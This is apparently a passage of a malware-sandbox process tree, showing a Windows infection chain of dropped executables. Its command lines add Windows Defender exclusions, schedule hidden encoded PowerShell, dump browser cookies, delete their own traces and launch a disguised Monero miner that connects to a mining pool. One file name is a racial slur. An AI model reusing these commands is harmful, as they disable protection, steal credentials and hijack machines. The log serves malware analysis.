C:\ProgramData\6821766.exe"C:\ProgramData\6821766.exe"14⤵PID:7076
-
-
C:\ProgramData\2309415.exe"C:\ProgramData\2309415.exe"14⤵PID:6988
-
-
C:\ProgramData\5262306.exe"C:\ProgramData\5262306.exe"14⤵PID:5464
-
-
C:\ProgramData\3575383.exe"C:\ProgramData\3575383.exe"14⤵PID:5276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr02k5hr.3bq\privacytools5.exe & exit12⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\dr02k5hr.3bq\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\dr02k5hr.3bq\privacytools5.exe13⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\dr02k5hr.3bq\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\dr02k5hr.3bq\privacytools5.exe14⤵PID:5260
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgzu4bwb.l0b\GcleanerWW.exe /mixone & exit12⤵PID:6296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g104msok.54s\19.exe & exit12⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\g104msok.54s\19.exeC:\Users\Admin\AppData\Local\Temp\g104msok.54s\19.exe13⤵PID:8072
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install14⤵PID:6904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oea15byd.gfk\b9706c20.exe & exit12⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\oea15byd.gfk\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\oea15byd.gfk\b9706c20.exe13⤵PID:5376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prp3t1wl.whl\setup.exe /8-2222 & exit12⤵PID:8636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3yd04q0.cks\file.exe & exit12⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\g3yd04q0.cks\file.exeC:\Users\Admin\AppData\Local\Temp\g3yd04q0.cks\file.exe13⤵PID:8776
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"14⤵PID:6348
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a2o00bm2.h2f\setup.exe /S /kr /site_id=754 & exit12⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\a2o00bm2.h2f\setup.exeC:\Users\Admin\AppData\Local\Temp\a2o00bm2.h2f\setup.exe /S /kr /site_id=75413⤵PID:3400
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"14⤵PID:4936
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&15⤵PID:7864
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3216⤵PID:7104
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQztcIlwH" /SC once /ST 15:42:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="14⤵
- Creates scheduled task(s)
PID:9092
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\05lywg23.g5p\Four.exe & exit12⤵PID:8396
-
C:\Users\Admin\AppData\Local\Temp\05lywg23.g5p\Four.exeC:\Users\Admin\AppData\Local\Temp\05lywg23.g5p\Four.exe13⤵PID:8256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\92-b74c4-3bc-933a1-a4c9219187731\Gefijomaeli.exe"C:\Users\Admin\AppData\Local\Temp\92-b74c4-3bc-933a1-a4c9219187731\Gefijomaeli.exe"11⤵PID:5836
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 78412⤵PID:7156
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ll03jxkh3fg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ll03jxkh3fg\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4608 -
C:\Users\Admin\AppData\Local\Temp\is-4G1UL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-4G1UL.tmp\Setup3310.tmp" /SL5="$30258,138429,56832,C:\Users\Admin\AppData\Local\Temp\ll03jxkh3fg\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\is-1J3U3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1J3U3.tmp\Setup.exe" /Verysilent10⤵PID:1128
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"11⤵PID:4288
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge13⤵PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome13⤵PID:3804
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox13⤵PID:3296
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"11⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5352
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"11⤵PID:3096
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit12⤵PID:3008
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f13⤵
- Kills process with taskkill
PID:1380
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:2272
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"11⤵PID:2860
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"11⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\is-B4IJF.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-B4IJF.tmp\LabPicV3.tmp" /SL5="$10428,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"12⤵PID:4904
-
C:\Users\Admin\AppData\Local\Temp\is-G5IL4.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-G5IL4.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:3284
-
C:\Program Files\Reference Assemblies\UQBMVVOGPB\prolab.exe"C:\Program Files\Reference Assemblies\UQBMVVOGPB\prolab.exe" /VERYSILENT14⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\is-6OJ81.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-6OJ81.tmp\prolab.tmp" /SL5="$3011E,575243,216576,C:\Program Files\Reference Assemblies\UQBMVVOGPB\prolab.exe" /VERYSILENT15⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\86-4c2c4-0cb-0a29e-4f033604a6cf8\Gaxovacalo.exe"C:\Users\Admin\AppData\Local\Temp\86-4c2c4-0cb-0a29e-4f033604a6cf8\Gaxovacalo.exe"14⤵PID:3848
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 228415⤵PID:8012
-
-
-
C:\Users\Admin\AppData\Local\Temp\57-a7e39-2aa-f4baf-09f25693cb39d\Huzhoqygili.exe"C:\Users\Admin\AppData\Local\Temp\57-a7e39-2aa-f4baf-09f25693cb39d\Huzhoqygili.exe"14⤵PID:5200
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xh0hbu0j.gtq\gaooo.exe & exit15⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\xh0hbu0j.gtq\gaooo.exeC:\Users\Admin\AppData\Local\Temp\xh0hbu0j.gtq\gaooo.exe16⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7668
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t1yh5olc.2up\md7_7dfj.exe & exit15⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\t1yh5olc.2up\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\t1yh5olc.2up\md7_7dfj.exe16⤵PID:7968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dywcd21u.rn1\customer6.exe & exit15⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\dywcd21u.rn1\customer6.exeC:\Users\Admin\AppData\Local\Temp\dywcd21u.rn1\customer6.exe16⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"17⤵PID:6704
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nlkl1ox3.a3h\askinstall31.exe & exit15⤵PID:6196
-
C:\Users\Admin\AppData\Local\Temp\nlkl1ox3.a3h\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\nlkl1ox3.a3h\askinstall31.exe16⤵PID:7740
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:7336
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5548
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25lpj5kq.gif\HookSetp.exe & exit15⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\25lpj5kq.gif\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\25lpj5kq.gif\HookSetp.exe16⤵PID:7948
-
C:\ProgramData\1865720.exe"C:\ProgramData\1865720.exe"17⤵PID:7036
-
-
C:\ProgramData\6348369.exe"C:\ProgramData\6348369.exe"17⤵PID:7988
-
-
C:\ProgramData\208499.exe"C:\ProgramData\208499.exe"17⤵PID:7812
-
-
C:\ProgramData\6044812.exe"C:\ProgramData\6044812.exe"17⤵PID:6244
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pfnazbga.onw\privacytools5.exe & exit15⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\pfnazbga.onw\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\pfnazbga.onw\privacytools5.exe16⤵PID:3984
-
C:\Users\Admin\AppData\Local\Temp\pfnazbga.onw\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\pfnazbga.onw\privacytools5.exe17⤵PID:7836
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2rkreit4.zuc\GcleanerWW.exe /mixone & exit15⤵PID:7416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fiwvwjvr.nir\19.exe & exit15⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\fiwvwjvr.nir\19.exeC:\Users\Admin\AppData\Local\Temp\fiwvwjvr.nir\19.exe16⤵PID:7964
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install17⤵PID:7324
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oa0grwq0.4bn\b9706c20.exe & exit15⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\oa0grwq0.4bn\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\oa0grwq0.4bn\b9706c20.exe16⤵PID:5300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nthz3zwo.2bb\setup.exe /8-2222 & exit15⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\nthz3zwo.2bb\setup.exeC:\Users\Admin\AppData\Local\Temp\nthz3zwo.2bb\setup.exe /8-222216⤵PID:3536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Quiet-Violet"17⤵PID:8240
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nje20i2n.w4o\file.exe & exit15⤵PID:7456
-
C:\Users\Admin\AppData\Local\Temp\nje20i2n.w4o\file.exeC:\Users\Admin\AppData\Local\Temp\nje20i2n.w4o\file.exe16⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"17⤵PID:2056
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2056 -s 14418⤵
- Program crash
PID:4672
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jdkbb0ir.hyq\setup.exe /S /kr /site_id=754 & exit15⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\jdkbb0ir.hyq\setup.exeC:\Users\Admin\AppData\Local\Temp\jdkbb0ir.hyq\setup.exe /S /kr /site_id=75416⤵PID:8188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txaehc4j.pa1\Four.exe & exit15⤵PID:9200
-
C:\Users\Admin\AppData\Local\Temp\txaehc4j.pa1\Four.exeC:\Users\Admin\AppData\Local\Temp\txaehc4j.pa1\Four.exe16⤵PID:4728
-
-
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"11⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"12⤵PID:5336
-
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth13⤵PID:8712
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"11⤵PID:5080
-
C:\ProgramData\5806588.exe"C:\ProgramData\5806588.exe"12⤵PID:5404
-
-
C:\ProgramData\4521689.exe"C:\ProgramData\4521689.exe"12⤵PID:4544
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵PID:4752
-
-
-
C:\ProgramData\921916.exe"C:\ProgramData\921916.exe"12⤵PID:4428
-
-
C:\ProgramData\2305281.exe"C:\ProgramData\2305281.exe"12⤵PID:360
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"11⤵PID:5124
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:2120
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:372
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:1300
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
PID:648
-
-
C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"11⤵PID:3628
-
C:\Users\Admin\Documents\ieRoxMvWFetqmz8K84QtYMHE.exe"C:\Users\Admin\Documents\ieRoxMvWFetqmz8K84QtYMHE.exe"12⤵PID:2376
-
C:\Users\Admin\Documents\XpbxY1HkP45le2QObSyljoDa.exe"C:\Users\Admin\Documents\XpbxY1HkP45le2QObSyljoDa.exe"13⤵PID:5956
-
C:\Users\Admin\Documents\XpbxY1HkP45le2QObSyljoDa.exe"C:\Users\Admin\Documents\XpbxY1HkP45le2QObSyljoDa.exe"14⤵PID:3488
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\80299856797.exe"15⤵PID:7756
-
C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\80299856797.exe"C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\80299856797.exe"16⤵PID:5800
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 80299856797.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\80299856797.exe" & del C:\ProgramData\*.dll & exit17⤵PID:7404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 80299856797.exe /f18⤵
- Kills process with taskkill
PID:5076
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:8480
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\81646398077.exe" /mix15⤵PID:7316
-
C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\81646398077.exe"C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\81646398077.exe" /mix16⤵PID:4464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\cAiiQdNiBCG & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\81646398077.exe"17⤵PID:8120
-
C:\Windows\SysWOW64\timeout.exetimeout 318⤵
- Delays execution with timeout.exe
PID:3784
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "XpbxY1HkP45le2QObSyljoDa.exe" /f & erase "C:\Users\Admin\Documents\XpbxY1HkP45le2QObSyljoDa.exe" & exit15⤵PID:3724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "XpbxY1HkP45le2QObSyljoDa.exe" /f16⤵
- Kills process with taskkill
PID:6972
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"14⤵PID:3732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\75566748981.exe"15⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\75566748981.exe"C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\75566748981.exe"16⤵PID:6648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 75566748981.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\75566748981.exe" & del C:\ProgramData\*.dll & exit17⤵PID:6492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 75566748981.exe /f18⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:212
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\13030731474.exe" /mix15⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\13030731474.exe"C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\13030731474.exe" /mix16⤵PID:7200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rKkntMDWV & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\13030731474.exe"17⤵PID:6400
-
C:\Windows\SysWOW64\timeout.exetimeout 318⤵
- Delays execution with timeout.exe
PID:4036
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit15⤵PID:8016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nigger.exe" /f16⤵
- Kills process with taskkill
PID:7124
-
-
-
-
-
C:\Users\Admin\Documents\lAqznCt3jTw0KRt8eGyb29O2.exe"C:\Users\Admin\Documents\lAqznCt3jTw0KRt8eGyb29O2.exe"13⤵PID:4676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 158814⤵
- Program crash
PID:792
-
-
-
C:\Users\Admin\Documents\1Ds9uZhl52d21r65KqeYfTqD.exe"C:\Users\Admin\Documents\1Ds9uZhl52d21r65KqeYfTqD.exe"13⤵PID:5960
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\64138439020.exe"14⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\64138439020.exe"C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\64138439020.exe"15⤵PID:6156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 64138439020.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\64138439020.exe" & del C:\ProgramData\*.dll & exit16⤵PID:7532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 64138439020.exe /f17⤵
- Kills process with taskkill
PID:5160
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 617⤵
- Delays execution with timeout.exe
PID:5424
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\42794767912.exe" /mix14⤵PID:6548
-
C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\42794767912.exe"C:\Users\Admin\AppData\Local\Temp\{0cDQ-Ofpwq-YPcd-F48aw}\42794767912.exe" /mix15⤵PID:6880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1Ds9uZhl52d21r65KqeYfTqD.exe" /f & erase "C:\Users\Admin\Documents\1Ds9uZhl52d21r65KqeYfTqD.exe" & exit14⤵PID:7020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1Ds9uZhl52d21r65KqeYfTqD.exe" /f15⤵
- Kills process with taskkill
PID:6964
-
-
-
-
C:\Users\Admin\Documents\Ypq58sMiw9CHiOt5YtdJrtkE.exe"C:\Users\Admin\Documents\Ypq58sMiw9CHiOt5YtdJrtkE.exe"13⤵PID:4420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 144414⤵
- Program crash
PID:5788
-
-
-
C:\Users\Admin\Documents\FmtFsKQsUtdQpmgnYpAmzm4V.exe"C:\Users\Admin\Documents\FmtFsKQsUtdQpmgnYpAmzm4V.exe"13⤵PID:5168
-
C:\Users\Admin\Documents\FmtFsKQsUtdQpmgnYpAmzm4V.exe"C:\Users\Admin\Documents\FmtFsKQsUtdQpmgnYpAmzm4V.exe"14⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\49436586037.exe"15⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\49436586037.exe"C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\49436586037.exe"16⤵PID:5680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 49436586037.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\49436586037.exe" & del C:\ProgramData\*.dll & exit17⤵PID:7540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 49436586037.exe /f18⤵
- Kills process with taskkill
PID:2196
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:7608
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\64456638077.exe" /mix15⤵PID:7724
-
